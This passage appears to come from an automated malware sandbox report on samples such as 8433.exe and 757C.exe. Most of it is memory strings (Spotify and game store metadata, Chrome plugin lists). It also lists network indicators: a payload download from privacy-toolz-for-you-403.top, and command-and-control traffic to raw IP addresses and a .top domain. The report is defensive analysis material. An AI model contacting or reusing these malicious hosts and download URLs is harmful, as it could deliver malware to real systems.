Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report
Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.465050962.000001D408BB3000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: naghenrietti1.top
Source: global traffic | HTTP traffic detected: GET /hcdrom1 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: t.me
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-toolz-for-you-403.top
Source: global traffic | HTTP traffic detected: GET /a.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 193.56.146.41:9080
Source: global traffic | HTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.100
Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown | TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown | TCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
                    Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
                    Source: 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different 
versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.twitter.com (Twitter)
